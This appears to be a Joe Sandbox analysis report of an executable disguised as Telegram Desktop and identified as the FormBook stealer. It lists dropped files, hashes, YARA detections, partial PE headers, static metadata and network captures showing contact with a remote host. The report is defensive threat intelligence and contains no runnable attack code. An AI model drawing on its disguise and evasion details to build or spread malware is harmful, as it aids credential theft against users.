                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@11/5@1/2
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 61.7% (good quality ratio 54.7%)
                                  • Quality average: 69.1%
                                  • Quality standard deviation: 33.6%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.114.77.33, 104.43.139.144, 104.43.193.48, 23.211.6.115, 40.88.32.150, 20.50.102.62, 20.54.110.249, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, skypedataprdcolneu04.cloudapp.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458848/sample/New_1007572_021.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  185.53.178.50http://wwww.fgoogle.atGet hashmaliciousBrowse
                                  • wwww.fgoogle.at/favicon.ico

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  TEAMINTERNET-ASDErL3Wx4zKD4.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                  • 185.53.179.90
                                  d9UdQnXQ86ld31G.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  YKqDUg3NxSA9bwZ.exeGet hashmaliciousBrowse
                                  • 185.53.178.11
                                  dl145cKtrs.exeGet hashmaliciousBrowse
                                  • 185.53.178.12
                                  PO 3457773.exeGet hashmaliciousBrowse
                                  • 185.53.177.14
                                  PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  Confirma PI#4042021 INVOICE.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  RFQ-2176 NEW PROJECT QUOTATION MAY.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  WXs8v9QuE7.exeGet hashmaliciousBrowse
                                  • 185.53.177.12
                                  KBzeB23bE1.exeGet hashmaliciousBrowse
                                  • 185.53.177.13
                                  xnuE49NGol.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  aVzUZCHkko.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  PO#310521.PDF.exeGet hashmaliciousBrowse
                                  • 185.53.178.10
                                  Scanned Specification Catalogue 7464.exeGet hashmaliciousBrowse
                                  • 185.53.177.52
                                  Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                  • 185.53.178.53
                                  $RAULIU9.exeGet hashmaliciousBrowse
                                  • 185.53.177.31
                                  350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                  • 185.53.177.12
                                  sample3.exeGet hashmaliciousBrowse
                                  • 185.53.177.12

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exeIMG_105_13_676_571.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exeGet hashmaliciousBrowse
                                      4-1.docGet hashmaliciousBrowse
                                        Order Inqury-93-23-20.docGet hashmaliciousBrowse
                                          IMG_7189012.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exeGet hashmaliciousBrowse
                                              77.docGet hashmaliciousBrowse
                                                qlvti.exeGet hashmaliciousBrowse
                                                  RFQ-220818.xlsGet hashmaliciousBrowse
                                                    RFQ-220818.xlsGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.log
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1119
                                                      Entropy (8bit):5.356708753875314
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                      MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                      SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                      SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                      SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                      Malicious:true
                                                      Reputation:moderate, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
                                                      Process:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):1.7089931293899303
                                                      Encrypted:false
                                                      SSDEEP:24:7U6Id6l1iWyyyyyyyyytrUUUUUUUUUUgro:oO
                                                      MD5:74BAFB3E707C7B0C63938AC200F99C7F
                                                      SHA1:10C5506337845ED9BF25C73D2506F9C15AB8E608
                                                      SHA-256:129450BA06AD589CF6846A455A5B6B5F55E164EE4906E409EB692AB465269689
                                                      SHA-512:5B24DC5ACD14F812658E832B587B60695FB16954FCA006C2C3A7382EF0EC65C3BD1AAF699425C49FF3CCEEF16869E75DD6F00EC189B9F673F08F7E1B80CF7781
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 5%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                      Joe Sandbox View:
                                                      • Filename: IMG_105_13_676_571.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe, Detection: malicious, Browse
                                                      • Filename: 4-1.doc, Detection: malicious, Browse
                                                      • Filename: Order Inqury-93-23-20.doc, Detection: malicious, Browse
                                                      • Filename: IMG_7189012.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious, Browse
                                                      • Filename: 77.doc, Detection: malicious, Browse
                                                      • Filename: qlvti.exe, Detection: malicious, Browse
                                                      • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                      • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview: MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L....y.>..........................................@..........................0......C................................................ ..............................................................................................................code................................ ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
                                                      Process:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):186368
                                                      Entropy (8bit):7.314572114292142
                                                      Encrypted:false
                                                      SSDEEP:3072:4dqYxe9j7g+D8OwXoopyPS5O1lFqRKMhZ6L7Ne61PCbyl2:4kXh8OIoYyq5ILqRKMo7cFN
                                                      MD5:48ECE2CA39A9EAE7FCED7418CF071D46
                                                      SHA1:7570995CBF699088A8F208015CB2C92BE5BC837A
                                                      SHA-256:4119B29BC938578D5D243DB714D0619228D37C10CCAA52925F9E81A410720D59
                                                      SHA-512:E897FDED4B643054796E410CADCC348C1215C934FE70F5407E36E9F10E59E2B10B7EDCBB99D746709AEF8FF498D98D848ADA90FB477EA732A128EE138ED0FD3B
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Metadefender, Detection: 49%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                      Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L.....N..........................................@.......................................@..........................................................................................................................................................text............................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):455168
                                                      Entropy (8bit):7.937198220453206
                                                      Encrypted:false
                                                      SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                      MD5:41137FD61B9CC0D92225C91660A5902C
                                                      SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                      SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                      SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 28%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....
                                                      C:\Users\user\AppData\Local\Temp\New_1007572_021.exe:Zone.Identifier
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.937198220453206
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:New_1007572_021.exe
                                                      File size:455168
                                                      MD5:41137fd61b9cc0d92225c91660a5902c
                                                      SHA1:15d023fd6d344cb18243469a3ee01fea6bb189af
                                                      SHA256:b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
                                                      SHA512:e32ee01fd957ee49f6bfceff4bc58b8b695111ef7416f8487398cbfafd16b2eeae0b79c41a8071075fd4e09d584cb642393f9e1655a5d70ab3135addd2e7ecba
                                                      SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@................................

                                                      File Icon

                                                      Icon Hash:888c9abc8c8ad8d8

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x46c58e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6c5400x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x46f4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x6a5940x6a600False0.982139578437data7.98710710749IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x6e0000x46f40x4800False0.181206597222data4.45766439274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x740000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x6e1300x4028dBase III DBT, version number 0, next free block index 40
                                                      RT_GROUP_ICON0x721580x14data
                                                      RT_VERSION0x7216c0x39cdata
                                                      RT_MANIFEST0x725080x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright (C) 2014-2021
                                                      Assembly Version2.7.4.0
                                                      InternalNameNew_1007572_021.exe
                                                      FileVersion2.7.4.0
                                                      CompanyNameTelegram FZ-LLC
                                                      LegalTrademarks
                                                      CommentsTelegram Desktop
                                                      ProductNameTelegram Desktop
                                                      ProductVersion2.7.4.0
                                                      FileDescriptionTelegram Desktop
                                                      OriginalFilenameNew_1007572_021.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      08/03/21-19:50:15.399423TCP1201ATTACK-RESPONSES 403 Forbidden8049760185.53.178.50192.168.2.4

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 19:50:15.349270105 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.365813971 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.366018057 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.382523060 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.382633924 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.399370909 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399422884 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399449110 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399853945 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.399990082 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.416416883 CEST8049760185.53.178.50192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 19:48:11.287277937 CEST5453153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:11.312505007 CEST53545318.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:11.646749973 CEST4971453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:11.674344063 CEST53497148.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:12.411608934 CEST5802853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:12.446872950 CEST53580288.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:12.730632067 CEST5309753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:12.770869970 CEST53530978.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:13.400338888 CEST4925753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:13.436501980 CEST53492578.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:14.382891893 CEST6238953192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:14.416975975 CEST53623898.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:15.471899986 CEST4991053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:15.496669054 CEST53499108.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:16.402900934 CEST5585453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:16.430919886 CEST53558548.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:17.192343950 CEST6454953192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:17.219954014 CEST53645498.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:18.285489082 CEST6315353192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:18.321301937 CEST53631538.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:19.212033987 CEST5299153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:19.236999035 CEST53529918.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:20.024746895 CEST5370053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:20.080260992 CEST53537008.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:20.851438046 CEST5172653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:20.884269953 CEST53517268.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:21.737622976 CEST5679453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:21.764936924 CEST53567948.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:22.957417011 CEST5653453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:22.990452051 CEST53565348.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:23.796653986 CEST5662753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:23.821459055 CEST53566278.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:24.635401011 CEST5662153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:24.660094023 CEST53566218.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:25.416462898 CEST6311653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:25.451778889 CEST53631168.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:26.146811008 CEST6407853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:26.187503099 CEST53640788.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:26.889657974 CEST6480153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:26.914860010 CEST53648018.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:42.516658068 CEST6172153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:42.552501917 CEST53617218.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:03.866585016 CEST5125553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:03.904426098 CEST53512558.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:04.029683113 CEST6152253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:04.068367004 CEST53615228.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:04.593688011 CEST5233753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:04.635272980 CEST53523378.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:05.538587093 CEST5504653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:05.572464943 CEST53550468.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:05.932722092 CEST4961253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:05.968030930 CEST53496128.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:06.440834045 CEST4928553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:06.482620955 CEST53492858.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:07.755753994 CEST5060153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:07.788120031 CEST53506018.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:08.429970980 CEST6087553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:08.455038071 CEST53608758.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:09.285213947 CEST5644853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:09.317590952 CEST53564488.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:10.636471987 CEST5917253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:10.671652079 CEST53591728.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:11.716171026 CEST6242053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:11.748574018 CEST53624208.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:12.524396896 CEST6057953192.168.2.48.8.8.8
